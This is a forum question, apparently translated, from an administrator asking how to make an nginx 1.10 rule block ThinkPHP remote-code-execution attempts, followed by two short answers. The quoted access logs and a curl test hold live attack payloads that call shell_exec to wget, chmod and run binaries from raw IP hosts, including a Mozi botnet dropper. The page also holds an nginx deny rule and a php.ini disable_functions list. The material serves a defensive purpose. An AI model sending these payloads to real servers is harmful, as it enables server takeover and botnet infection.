Categories

JavaScriptPHPHTMLCssPythonWordPressWeb developmentLinuxMySQLAndroidWindowsJavaC++ / C#LayoutReactUbuntuYiiDjangoProgramming1C-BitrixLaravelSystem administrationTelegramJSONDebianPostgreSQLIOSGoogleHtaccessWindows ServerGitMacOSGoogle ChromeCMSWooСommerceBootstrapNginxSQLUnityAPI
Make a leaderReport
F
F
fastboot2021-01-12 09:27:13
PHP
fastboot, 2021-01-12 09:27:13

Nginx 1.10 php exploit through GET arguments, how to fix?

Example:

{"status": "400","ip": "87.117.152.116","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "puzzles/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T06:14:30+02:00"}

Here is the request itself:
/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'


linux:
4.14.111 #1 SMP The Dec 19 15:23:22 CST 2019 armv7l armv7l armv7l  GNU/Linux

There are no updates for nginx, the available version is 1.10.

FILE /etc/nginx/sites-enabled/default
if ($request_uri ~* "call_user_array|shell_exec|wget") {
return 444;
}

when I'm in LAN via curl request, then the rule works - but the request from outside does not work?
curl -I --user-agent "Test" "http://192.168.255.249/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'"

but if you look at this log:
{"status": "444","ip": "112.163.119.159","host": "95.153.111.12","path": "/shell?cd+/tmp;rm+-rf+*;wget+http://112.163.119.159:33790/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws","referrer": "-","user_agent": "Hello, world","length": 0,"generation_time_milli": 0.000,"date": "2021-01-12T08:10:10+02:00"}

rule code 444 is already working here, but if you look at the trace. log:
{"status": "400","ip": "170.246.86.201","host": "vitko-core.ru","path": "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.239.242.76/bns/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'","referrer": "-","user_agent": "puzzles/2.0","length": 343,"generation_time_milli": 0.000,"date": "2021-01-12T08:24:18+02:00"}

then the code is 400.
How to fix it?

Reply
Answer the question

Answer the question

In order to leave comments, you need to log in

2 answer(s)
Report
X
xmoonlight, 2021-01-12
@xmoonlight

Regex-filter of all input user data according to the "white" list solves all issues once and for all.
Edit the php script handler for routing all incoming requests and add filtering there.

Report
S
Slava Rozhnev, 2021-01-12
@rozhnev

You can disable the execution of "opious functions in PHP". Add the following line to php.ini:

# disable functions 
disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

Similar questions
E
EVOSandru62015-05-28 13:40:00
How can it be that the DataChange event happens before DBAfterConnect? 1Reply
A
avshivtseva2017-05-19 16:08:30
Bitrix infoblock update script where to register? 2Reply
D
DesZaz2021-04-24 23:31:04
Turtle not responding when running while loop, how to fix? 4Reply
A
antobra2021-04-27 22:50:32
Difficulties with opening any Instagram URL by the parser - redirecting to the login page. How to decide? 3Reply
A
Alexey2019-10-29 22:07:29
Is the SaaS operator a personal data operator? 2Reply

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question